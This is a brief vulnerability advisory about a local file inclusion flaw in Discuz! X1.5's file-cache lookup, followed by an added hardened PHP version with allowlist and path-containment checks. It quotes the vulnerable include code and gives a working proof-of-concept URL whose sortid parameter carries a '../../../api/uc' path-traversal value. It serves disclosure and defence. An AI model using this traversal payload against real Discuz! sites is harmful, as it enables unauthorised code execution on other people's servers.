Discuz! X1.5 local file inclusion vulnerability

ID MYHACK58:62201129530
Type myhack58
Reporter Anonymous
Modified 2011-02-23T00:00:00


The Discuz! X1.5 local file inclusion is conditional: the site must be using files as its cache, i.e. config_global.php contains $_config['cache']['type'] = 'file';

    function cachedata($cachenames) {
        ......
        $isfilecache = getglobal('config/cache/type') == 'file';
        ......
        if($isfilecache) {
            $lostcaches = array();
            foreach($cachenames as $cachename) {
                // $cachename is concatenated into the include path as-is
                if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {
                    $lostcaches[] = $cachename;
                }
            }

        ......
    }

Address: http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

Requesting this address returns "Authracation has expiried", which shows that the page code of api/uc.php was executed.

Author: Jannock
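
A hardened form of the cache lookup shown above, as an added example (not Discuz! code and not the vendor's fix): the cache name must match an identifier allowlist, and the resolved file must sit directly inside data/cache. The function names safe_cache_path and load_caches and the temporary demo tree are assumptions constructed for illustration.

```php
<?php
// Added example, not Discuz! code. Function names and the demo tree are hypothetical.

// Return the absolute path of a cache file, or null if $cachename is unsafe.
function safe_cache_path(string $root, string $cachename): ?string {
    // 1. Allowlist: a cache name is a plain identifier, never a path fragment.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $cachename)) {
        return null;
    }
    // 2. Containment: the resolved file must sit directly inside data/cache.
    $cacheDir = realpath($root . '/data/cache');
    if ($cacheDir === false) {
        return null;
    }
    $file = realpath($cacheDir . '/cache_' . $cachename . '.php');
    if ($file === false || dirname($file) !== $cacheDir) {
        return null;
    }
    return $file;
}

// Same contract as the loop in cachedata(): return the names that were not loaded.
function load_caches(string $root, array $cachenames): array {
    $lost = array();
    foreach ($cachenames as $name) {
        $path = safe_cache_path($root, (string) $name);
        if ($path === null || !(include_once $path)) {
            $lost[] = $name;
        }
    }
    return $lost;
}

// Constructed demo tree: one real cache file and one file outside the cache dir.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/data/cache', 0700, true);
mkdir($root . '/api', 0700, true);
file_put_contents($root . '/data/cache/cache_forums.php', '<?php $GLOBALS["loaded"][] = "forums";');
file_put_contents($root . '/api/uc.php', '<?php $GLOBALS["loaded"][] = "api/uc";');

// 'forums' is a valid name; the second value is the sortid value from the address above.
$lost = load_caches($root, array('forums', 'ygjgj/../../../api/uc'));
var_dump($lost, $GLOBALS['loaded']);
```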